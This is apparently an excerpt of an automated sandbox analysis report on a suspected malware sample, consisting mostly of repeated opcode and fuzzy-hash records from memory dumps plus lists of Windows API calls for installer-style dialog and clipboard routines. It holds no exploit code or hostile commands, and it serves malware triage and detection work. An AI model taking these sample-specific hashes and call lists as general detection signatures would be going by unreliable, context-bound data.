                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2aef77e923687ef81917df3f57bac539efdc90af2b59cbb4abef7e153e8536c6
                                                                                                                • Instruction ID: 6c9b3311d7940e1ddbc683953754fd9558a9b675f3934f64a76ed896cf5d6eed
                                                                                                                • Opcode Fuzzy Hash: 2aef77e923687ef81917df3f57bac539efdc90af2b59cbb4abef7e153e8536c6
                                                                                                                • Instruction Fuzzy Hash: B4C1C374E01218CFDB54DFA5C994B9DBBB2BF89304F6080A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6e002e1f2c5b34589943c7144cd2ebcde55f1c0bfdb12ce40cb98120c7a2388b
                                                                                                                • Instruction ID: 904179627262498bb64101eb80d83b19e0494fdd08c7cd608ac6bdcdd4bf153f
                                                                                                                • Opcode Fuzzy Hash: 6e002e1f2c5b34589943c7144cd2ebcde55f1c0bfdb12ce40cb98120c7a2388b
                                                                                                                • Instruction Fuzzy Hash: 8BC1A074E01218CFDB54DFA5C995B9DBBB2BF89304F6080A9D809BB355DB359A82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 04fb69c137cf9f666b4bccbf5400707a15ed4331aa7aad28f40b2f2a04d01c59
                                                                                                                • Instruction ID: fe246706eecec05641d27941259b818c50439e34beccd5e78fdf1afd4ecdb701
                                                                                                                • Opcode Fuzzy Hash: 04fb69c137cf9f666b4bccbf5400707a15ed4331aa7aad28f40b2f2a04d01c59
                                                                                                                • Instruction Fuzzy Hash: 86C1B374E01218CFEB54DFA5C995B9DBBB2BF89300F6081A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dc47ef4fd06cff53d650aeafc52d27efb8ef2035c3344e646e15bcc96c886caf
                                                                                                                • Instruction ID: ddfe2d1d03dd6c154938abc6700dbb774ed866ec4b9d0d41936d84fa140ee521
                                                                                                                • Opcode Fuzzy Hash: dc47ef4fd06cff53d650aeafc52d27efb8ef2035c3344e646e15bcc96c886caf
                                                                                                                • Instruction Fuzzy Hash: A5C1B274E01218CFDB54DFA9C995B9DBBB2BF89300F6080A9D409AB355DB359E86CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 63b34172c995aeafea7ed24404097b9e175b5d56c78a641310bc43c8f82f6286
                                                                                                                • Instruction ID: 4e9b29accb6bc9a2ffe39ee2e58fcca62753e0f38695a01a74c903dc158ed2b5
                                                                                                                • Opcode Fuzzy Hash: 63b34172c995aeafea7ed24404097b9e175b5d56c78a641310bc43c8f82f6286
                                                                                                                • Instruction Fuzzy Hash: CCC1B274E01218CFDB54DFA9C994B9DBBB2BF89300F6080A9D409AB355DB359E82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4cdd73500b70c6d0f663f2af494a22249c15dad9197810c9df7f666171c8591e
                                                                                                                • Instruction ID: dfbace061af22f3992ed0ee69ede1f34fe4045065092e45bea46cba197bb9262
                                                                                                                • Opcode Fuzzy Hash: 4cdd73500b70c6d0f663f2af494a22249c15dad9197810c9df7f666171c8591e
                                                                                                                • Instruction Fuzzy Hash: 99C1C474E01218CFDB54DFA9C995B9DBBB2BF89300F5080A9D809AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 903068080178a41221a1377ea71da1f81f2e8618983fc1c6ce79082e3479840e
                                                                                                                • Instruction ID: fa310dab1056a45ec231aa6c8ad578e3264f58ccc5c5d99f34d6289962e2631e
                                                                                                                • Opcode Fuzzy Hash: 903068080178a41221a1377ea71da1f81f2e8618983fc1c6ce79082e3479840e
                                                                                                                • Instruction Fuzzy Hash: AEC1B374E01218CFEB54DFA9C994B9DBBB2BF89300F6080A9D409AB355DB355E81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c21f89597011b08bec0dde635f4aed1928eac5d43a7eae17066ede3dd548d647
                                                                                                                • Instruction ID: 99487d5ebe3f930d085620ee4cf818eb2bb13fb72c6f620718639d4847262814
                                                                                                                • Opcode Fuzzy Hash: c21f89597011b08bec0dde635f4aed1928eac5d43a7eae17066ede3dd548d647
                                                                                                                • Instruction Fuzzy Hash: BBC1B374E01218CFDB54DFA5C995B9DBBB2BF89300F6081AAD409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1b81571cf01582636f4893b05b1458aaef376d112f03b848b95c860ee9b626c5
                                                                                                                • Instruction ID: e9eef9a29d69bd96ca210061ead7821889a0fa010917552411e8130cd373bde8
                                                                                                                • Opcode Fuzzy Hash: 1b81571cf01582636f4893b05b1458aaef376d112f03b848b95c860ee9b626c5
                                                                                                                • Instruction Fuzzy Hash: 40C1A274E01218CFDB54DFA9C994B9DBBB2BF89300F6080AAD409AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ab6d91535bfefe6cd86922527ceed2e5baad58b2d0d486a6a2ce337275692066
                                                                                                                • Instruction ID: 8fa7792ec76e47769c74acf91428bb303e382508860661be96d14b9c1f80f987
                                                                                                                • Opcode Fuzzy Hash: ab6d91535bfefe6cd86922527ceed2e5baad58b2d0d486a6a2ce337275692066
                                                                                                                • Instruction Fuzzy Hash: C3C1B374E01218CFDB54DFA9C995B9DBBB2BF89300F6080A9D409AB355DB359E86CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e0accc79fde5edf0ecb529a1757f23fc72921b1955844a030487d4d8f2732480
                                                                                                                • Instruction ID: 8fdb94b073b1445358df59f2ab2ac02abfaf294c73bf559f06b999c36164d3af
                                                                                                                • Opcode Fuzzy Hash: e0accc79fde5edf0ecb529a1757f23fc72921b1955844a030487d4d8f2732480
                                                                                                                • Instruction Fuzzy Hash: 6EC1B374E01218CFDB54DFA5C995B9DBBB2BF89300F6080A9D409AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4a415512c01dc02697861d7b456580bcfdabcc7ae14a6d0c8487aeb0c5dc57eb
                                                                                                                • Instruction ID: f5351bbed4c72715e1c3ed44c91a4face80b5a4fb259da241da51a5932579b00
                                                                                                                • Opcode Fuzzy Hash: 4a415512c01dc02697861d7b456580bcfdabcc7ae14a6d0c8487aeb0c5dc57eb
                                                                                                                • Instruction Fuzzy Hash: CCC1B374E01218CFDB54DFA9C994B9DBBB2BF89300F6080A9D409AB355DB359E86CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60c2a389eb23c6a0ef0a66b8454af47fcbf45376e175f801d3605bab1eea03da
                                                                                                                • Instruction ID: f630eedf15404c9b64fa1da978b66bc1d295adf6dbb73852460afd8cc507b8c7
                                                                                                                • Opcode Fuzzy Hash: 60c2a389eb23c6a0ef0a66b8454af47fcbf45376e175f801d3605bab1eea03da
                                                                                                                • Instruction Fuzzy Hash: 26C1B274E01218CFDB54DFA9C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a3ef5dcafce01d39ace60612fb91e0e391ee912bab69ce806eb4b141e86dbc4a
                                                                                                                • Instruction ID: 849b44329a2fdf39f0a6c2dda2ed86cd7cfaa7b67976d269d4e94424f585accb
                                                                                                                • Opcode Fuzzy Hash: a3ef5dcafce01d39ace60612fb91e0e391ee912bab69ce806eb4b141e86dbc4a
                                                                                                                • Instruction Fuzzy Hash: 46C1B374E01218CFEB54DFA5C995B9DBBB2BF89300F6080A9D409AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 069c6ee75de890ecf4c786faa9d17a621bcee97258dc62b3a3dffddbb586bfd2
                                                                                                                • Instruction ID: 1ca3d6929ec74c151e01555000b2e3dd5197ecc420898d7bf0504dee14e71f43
                                                                                                                • Opcode Fuzzy Hash: 069c6ee75de890ecf4c786faa9d17a621bcee97258dc62b3a3dffddbb586bfd2
                                                                                                                • Instruction Fuzzy Hash: 80C1B374E01218CFDB54DFA9C995B9DBBB2BF89300F6081AAD409AB355DB359E81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 97896e20114aaf92a1d09eedea96a049cec74b3ab0839907107190872372589b
                                                                                                                • Instruction ID: d1f2c43c929f0b1972347edfb2ce590acf4750c7872aeca9dfcd35a906196618
                                                                                                                • Opcode Fuzzy Hash: 97896e20114aaf92a1d09eedea96a049cec74b3ab0839907107190872372589b
                                                                                                                • Instruction Fuzzy Hash: 81C1A074E01218CFDB54DFA9C995B9DBBB2BF89300F6080A9D409BB355DB359A82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6e37f50e2c0c90eeb32c6e59905fbdf4f143b1571c6c63648bdc0808bfcc6d4
                                                                                                                • Instruction ID: 8e0c887ff24fb41b7ee62ffddace15ac76cfdcb8bfc20c66992aa6fcbec3d775
                                                                                                                • Opcode Fuzzy Hash: d6e37f50e2c0c90eeb32c6e59905fbdf4f143b1571c6c63648bdc0808bfcc6d4
                                                                                                                • Instruction Fuzzy Hash: 1BC1B374E01218CFEB54DFA5C994B9DBBB2BF89300F5081A9D409AB355DB355E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 70d4b4e6ae74a937ad4c6082b22eb57190183301fc2ba2f847908c2e47f70e2c
                                                                                                                • Instruction ID: e659fb576a1d9aa0864f88b3de0fb1f63e2ebaa20de57b2bcca3c98ea8d9664a
                                                                                                                • Opcode Fuzzy Hash: 70d4b4e6ae74a937ad4c6082b22eb57190183301fc2ba2f847908c2e47f70e2c
                                                                                                                • Instruction Fuzzy Hash: 0FC1B274E01218CFDB54DFA9C994B9DBBB2BF89304F6080A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ac91032aa3352eed7299d880773f4211f935ac13a87b917dd9e80351b644cf10
                                                                                                                • Instruction ID: 9807a3c21020e0fd6e0cb224f3842eeaa805e57bd73efb533b25e7846563d24c
                                                                                                                • Opcode Fuzzy Hash: ac91032aa3352eed7299d880773f4211f935ac13a87b917dd9e80351b644cf10
                                                                                                                • Instruction Fuzzy Hash: 85C1D174E01218CFDB54DFA9C994B9DBBB2BF89314F6080A9D809AB355DB349E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ee77f705f4f390b808aec77b0edc2543e99aa6018af0cea7ce41bf40b3b56aa7
                                                                                                                • Instruction ID: 16d5e8834a80f074651cf97484c02e5fb392a0f30dd159fa4d0b708742a6e41f
                                                                                                                • Opcode Fuzzy Hash: ee77f705f4f390b808aec77b0edc2543e99aa6018af0cea7ce41bf40b3b56aa7
                                                                                                                • Instruction Fuzzy Hash: E5C1D174E01218CFDB54DFA9C994B9DBBB2BF89304F6080A9D809AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c4ba020bb847685fc4f6ea350f102ef186337ad07f855bcac7538ab95fce9ad2
                                                                                                                • Instruction ID: 0df22d7c224c1cfb3b6a6f8421d3856aff8d7cecaf90866d58a659b0afdbbe79
                                                                                                                • Opcode Fuzzy Hash: c4ba020bb847685fc4f6ea350f102ef186337ad07f855bcac7538ab95fce9ad2
                                                                                                                • Instruction Fuzzy Hash: 40C1D274E01218CFEB54DFA9C985B9DBBB2BF89304F6080A9D409AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 06d7dfde526c87510f310cc44425abc6ada6bf1b22ab3b575b34cbffee65b626
                                                                                                                • Instruction ID: eeaf2611d8221e92ea3256af34a64ce257fdee828c7bd0d00eb760221df5cf01
                                                                                                                • Opcode Fuzzy Hash: 06d7dfde526c87510f310cc44425abc6ada6bf1b22ab3b575b34cbffee65b626
                                                                                                                • Instruction Fuzzy Hash: F4C1A078E01218CFDB54DFA9C995B9DBBB2BF89304F6080A9D409BB355DB359A81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 90b8f0f7a45edcf01c0df68e4ad8b084a1be91c9ab656a9aae08f473910c149e
                                                                                                                • Instruction ID: 542de1a115f54f2d730ab662583c1095f9094b496bf29d2b1684cb647ea5e221
                                                                                                                • Opcode Fuzzy Hash: 90b8f0f7a45edcf01c0df68e4ad8b084a1be91c9ab656a9aae08f473910c149e
                                                                                                                • Instruction Fuzzy Hash: 1FC1A174E01218CFDB54DFA9C995B9DBBB2BF89304F6080A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747576107.0000000039470000.00000040.00000800.00020000.00000000.sdmp, Offset: 39470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_39470000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 682791160dd9bbac95ef17d4fff13e5da56a58cf52ab751a40b20f963ac7a40b
                                                                                                                • Instruction ID: 488dadae056af210558a5fd1d1b1a5abe2488404e00214b29a9c9794bef7df5f
                                                                                                                • Opcode Fuzzy Hash: 682791160dd9bbac95ef17d4fff13e5da56a58cf52ab751a40b20f963ac7a40b
                                                                                                                • Instruction Fuzzy Hash: 59D06779E1431C8ACB11EF98E8802ECF7B0AB9A325F0024A6815DA7214DB715AA4CF56
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                • ShowWindow.USER32(?,?), ref: 004056DC
                                                                                                                • GetDlgItem.USER32(?,?), ref: 004056FD
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040560B
                                                                                                                  • Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040574F
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                • ShowWindow.USER32(?,?), ref: 0040578D
                                                                                                                • ShowWindow.USER32(?), ref: 004057D7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                • CloseClipboard.USER32 ref: 00405912
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                • String ID: (7B${
                                                                                                                • API String ID: 590372296-525222780
                                                                                                                • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                                • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                                • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                • String ID: (7B
                                                                                                                • API String ID: 184305955-3251261122
                                                                                                                • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                                • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                                • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                                  • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75573420,00435000,00000000), ref: 00403B59
